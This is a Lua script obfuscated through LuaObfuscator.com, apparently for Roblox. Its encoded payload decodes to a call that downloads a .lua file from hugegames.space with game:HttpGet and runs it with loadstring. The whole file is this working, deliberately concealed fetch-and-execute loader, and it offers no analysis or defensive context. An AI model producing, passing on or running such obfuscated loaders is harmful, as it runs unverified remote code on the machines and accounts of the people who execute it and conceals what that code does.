--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23() local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + 2 ;return (v33 * (732 -476)) + v32 ;end v18=3;end if (v18==4) then function v25() local v34=0 -0 ;local v35;local v36;local v37;local v38;local v39;local v40;while true do if (v34==(4 -2)) then v39=v21(v36,(1070 -(44 + 386)) -(555 + 64) ,31);v40=((v21(v36,963 -(857 + 74) )==(569 -(367 + 201))) and  -(928 -(214 + 713))) or (1 + 0) ;v34=5 -2 ;end if (v34==(1 + 0)) then v37=1 + 0 ;v38=(v21(v36,878 -(282 + 595) ,1657 -(1523 + 114) ) * ((5 -(1489 -(998 + 488)))^(29 + 3))) + v35 ;v34=2 -(0 + 0) ;end if (v34==(3 -0)) then if (v39==(1065 -(68 + 997))) then if (v38==(1270 -(226 + 1044))) then return v40 * (0 -0) ;else local v98=117 -(32 + 85) ;while true do if (v98==(0 + 0 + 0)) then v39=1;v37=0 + 0 ;break;end end end elseif (v39==(6433 -4386)) then return ((v38==(957 -(892 + 65))) and (v40 * (1/(0 -0)))) or (v40 * NaN) ;end return v8(v40,v39-(1890 -867) ) * (v37 + (v38/(((778 -(201 + 571)) -4)^(94 -42)))) ;end if (v34==(350 -((1225 -(116 + 1022)) + 263))) then v35=v24();v36=v24();v34=(1827 -1388) -(145 + 293) ;end end end v26=nil;function v26(v41) local v42;if  not v41 then local v83=0 + 0 ;while true do if (v83==(0 -0)) then v41=v24();if (v41==(0 -(0 + 0))) then return "";end break;end end end v42=v3(v16,v19,(v19 + v41) -(860 -(814 + 45)) );v19=v19 + v41 ;local v43={};for v67=2 -1 , #v42 do v43[v67]=v2(v1(v3(v42,v67,v67)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29() local v44=1824 -(1195 + 629) ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v44~=0) then else v45=0;v46=nil;v44=1 -0 ;end if (3~=v44) then else v51=nil;v52=nil;v44=4;end if (v44==(243 -(187 + 54))) then v49=nil;v50=nil;v44=783 -(162 + 618) ;end if (v44==(3 + 1)) then while true do if (v45==0) then v46=0;v47=nil;v45=1 + 0 ;end if (v45==2) then local v96=0;while true do if (v96~=1) then else v45=6 -3 ;break;end if ((0 -0)==v96) then v50=nil;v51=nil;v96=1;end end end if (v45==3) then v52=nil;while true do local v99=0;local v100;while true do if (v99==(0 + 0)) then v100=0;while true do if (v100==(1636 -(1373 + 263))) then if (v46==1) then local v140=1000 -(451 + 549) ;local v141;local v142;while true do if ((0 + 0)~=v140) then else v141=0 -0 ;v142=nil;v140=1;end if (v140==1) then while true do if ((0 -0)==v141) then v142=0;while true do if (v142~=0) then else v50={v47,v48,nil,v49};v51=v24();v142=342 -(218 + 123) ;end if (v142==1) then v52={};v46=1583 -(1535 + 46) ;break;end end break;end end break;end end end if ((0 + 0)~=v46) then else local v143=0 + 0 ;local v144;while true do if (v143==0) then v144=560 -(306 + 254) ;while true do if (v144~=1) then else v49={};v46=1;break;end if (0==v144) then v47={};v48={};v144=1;end end break;end end end v100=1;end if (v100==(1 + 0)) then if (v46~=2) then else local v145=0;local v146;while true do if (v145==(0 -0)) then v146=1467 -(899 + 568) ;while true do if (v146==0) then local v150=0;while true do if (v150~=0) then else for v159=1 + 0 ,v51 do local v160=0;local v161;local v162;local v163;while true do if (1==v160) then v163=nil;while true do if (v161==1) then if (v162==1) then v163=v22()~=0 ;elseif (v162==2) then v163=v25();elseif (v162~=3) then else v163=v26();end v52[v159]=v163;break;end if (v161~=0) then else local v168=0;local v169;while true do if (v168~=0) then else v169=0 -0 ;while true do if (v169==0) then local v178=603 -(268 + 335) ;while true do if (v178~=(290 -(60 + 230))) then else v162=v22();v163=nil;v178=1;end if (v178==(573 -(426 + 146))) then v169=1 + 0 ;break;end end end if ((1457 -(282 + 1174))==v169) then v161=812 -(569 + 242) ;break;end end break;end end end end break;end if (v160~=0) then else v161=0 -0 ;v162=nil;v160=1 + 0 ;end end end v50[3]=v22();v150=1025 -(706 + 318) ;end if (v150==(1252 -(721 + 530))) then v146=1;break;end end end if (v146==1) then for v151=1272 -(945 + 326) ,v24() do local v152=0 -0 ;local v153;local v154;local v155;while true do if (v152==(0 + 0)) then v153=700 -(271 + 429) ;v154=nil;v152=1;end if (v152==1) then v155=nil;while true do if (v153==0) then local v164=0 + 0 ;local v165;while true do if ((1500 -(1408 + 92))~=v164) then else v165=1086 -(461 + 625) ;while true do if (v165~=1) then else v153=1;break;end if (v165==(1288 -(993 + 295))) then local v175=0 + 0 ;while true do if (v175==(1171 -(418 + 753))) then v154=0 + 0 ;v155=nil;v175=1;end if (v175==(1 + 0)) then v165=1 + 0 ;break;end end end end break;end end end if (1==v153) then while true do if (v154==0) then v155=v22();if (v21(v155,1,1 + 0 )==(529 -(406 + 123))) then local v170=0;local v171;local v172;local v173;local v174;while true do if (v170==(1770 -(1749 + 20))) then v173=nil;v174=nil;v170=1 + 1 ;end if (v170~=(1322 -(1249 + 73))) then else v171=0 + 0 ;v172=nil;v170=1146 -(466 + 679) ;end if (v170~=(4 -2)) then else while true do if (v171==(2 -1)) then local v179=0;local v180;while true do if (v179==(1900 -(106 + 1794))) then v180=0 + 0 ;while true do if (v180==1) then v171=1 + 1 ;break;end if (v180==(0 -0)) then local v186=0;while true do if (0~=v186) then else v174={v23(),v23(),nil,nil};if (v172==(584 -(57 + 527))) then local v191=0;local v192;while true do if (v191==(1427 -(41 + 1386))) then v192=0;while true do if (v192~=(103 -(17 + 86))) then else v174[3 + 0 ]=v23();v174[4]=v23();break;end end break;end end elseif (v172==(1 -0)) then v174[8 -5 ]=v24();elseif (v172==(168 -(122 + 44))) then v174[5 -2 ]=v24() -((6 -4)^(14 + 2)) ;elseif (v172~=(1 + 2)) then else local v197=0 -0 ;local v198;local v199;while true do if (v197~=(66 -(30 + 35))) then else while true do if (v198==(0 + 0)) then v199=0;while true do if (v199==(1257 -(1043 + 214))) then v174[3]=v24() -((7 -5)^(1228 -(323 + 889))) ;v174[4]=v23();break;end end break;end end break;end if (v197==0) then v198=0 -0 ;v199=nil;v197=581 -(361 + 219) ;end end end v186=1;end if (v186==(321 -(53 + 267))) then v180=1;break;end end end end break;end end end if (2~=v171) then else local v181=0 + 0 ;while true do if ((414 -(15 + 398))==v181) then v171=3;break;end if (0==v181) then local v185=982 -(18 + 964) ;while true do if ((3 -2)==v185) then v181=1 + 0 ;break;end if (v185~=0) then else if (v21(v173,1 + 0 ,1)~=(851 -(20 + 830))) then else v174[2]=v52[v174[2]];end if (v21(v173,2,2 + 0 )==1) then v174[129 -(116 + 10) ]=v52[v174[1 + 2 ]];end v185=739 -(542 + 196) ;end end end end end if (v171==(0 -0)) then v172=v21(v155,1 + 1 ,3);v173=v21(v155,4,4 + 2 );v171=1 + 0 ;end if ((7 -4)==v171) then if (v21(v173,3,3)==(2 -1)) then v174[4]=v52[v174[4]];end v47[v151]=v174;break;end end break;end end end break;end end break;end end break;end end end v46=3;break;end end break;end end end if (v46==(1554 -(1126 + 425))) then local v147=0;local v148;local v149;while true do if (v147==(405 -(118 + 287))) then v148=0;v149=nil;v147=3 -2 ;end if (v147==(1122 -(118 + 1003))) then while true do if (v148==0) then v149=0 -0 ;while true do if (v149==0) then local v157=377 -(142 + 235) ;local v158;while true do if (v157~=0) then else v158=0 -0 ;while true do if (v158~=0) then else local v166=0 + 0 ;while true do if (v166==0) then for v176=978 -(553 + 424) ,v24() do v48[v176-1 ]=v29();end return v50;end end end end break;end end end end break;end end break;end end end break;end end break;end end end break;end if (v45==(1 -0)) then local v97=0;while true do if (v97==1) then v45=2;break;end if (0~=v97) then else v48=nil;v49=nil;v97=1;end end end end break;end if (v44~=1) then else v47=nil;v48=nil;v44=2;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53) if (v1(v53,2)==79) then v20=v0(v3(v53,1,1));return "";else local v84=v2(v0(v53,16));if v20 then local v91=v5(v84,v20);v20=nil;return v91;else return v84;end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v54,v55,v56,v57=v1(v16,v19,v19 + 3 );v19=v19 + 4 ;return (v57 * (14779330 + 1997886)) + (v56 * (65011 + 525)) + (v55 * (150 + 106)) + v54 ;end v25=nil;v18=4;end if (v18==7) then function v30(v58,v59,v60) local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...) local v69=v61;local v70=v62;local v71=v63;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v85=0,v77 do if (v85>=v71) then v75[v85-v71 ]=v76[v85 + 1 ];else v79[v85]=v76[v85 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=3) then if (v82<=1) then if (v82==0) then local v101;local v102,v103;local v104;local v105;v79[v81[2]]=v60[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v60[v81[3]];v73=v73 + 1 ;v81=v69[v73];v105=v81[2];v104=v79[v81[3]];v79[v105 + 1 ]=v104;v79[v105]=v104[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v105=v81[2];v102,v103=v72(v79[v105](v13(v79,v105 + 1 ,v81[3])));v74=(v103 + v105) -1 ;v101=0;for v131=v105,v74 do v101=v101 + 1 ;v79[v131]=v102[v101];end v73=v73 + 1 ;v81=v69[v73];v105=v81[2];v79[v105]=v79[v105](v13(v79,v105 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end else local v115=v81[2];local v116=v79[v81[3]];v79[v115 + 1 ]=v116;v79[v115]=v116[v81[4]];end elseif (v82==2) then local v120=0;local v121;local v122;local v123;local v124;while true do if (v120==0) then v121=v81[2];v122,v123=v72(v79[v121](v13(v79,v121 + 1 ,v81[3])));v120=1;end if (v120==2) then for v137=v121,v74 do v124=v124 + 1 ;v79[v137]=v122[v124];end break;end if (v120==1) then v74=(v123 + v121) -1 ;v124=0;v120=2;end end else v79[v81[2]]();end elseif (v82<=5) then if (v82==4) then v79[v81[2]]=v81[3];else local v127=0;local v128;while true do if (0==v127) then v128=v81[2];v79[v128]=v79[v128](v13(v79,v128 + 1 ,v74));break;end end end elseif (v82==6) then v79[v81[2]]=v60[v81[3]];else do return;end end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66) if v66 then local v88=0 + 0 ;local v89;while true do if (v88==0) then v89=(v64/((2 + 0)^(v65-(2 -1))))%((5 -3)^(((v66-(2 -1)) -(v65-(1 + 0))) + 1)) ;return v89-(v89%(4 -3)) ;end end else local v90=(755 -(174 + 65 + 514))^(v65-(1 + 0)) ;return (((v64%(v90 + v90))>=v90) and 1) or (1329 -(797 + 532)) ;end end v22=nil;v18=2;end end end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F6875676567616D65732E73706163652F37343136326233366533356463333036382O3630316566332E6C756100083O00124O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
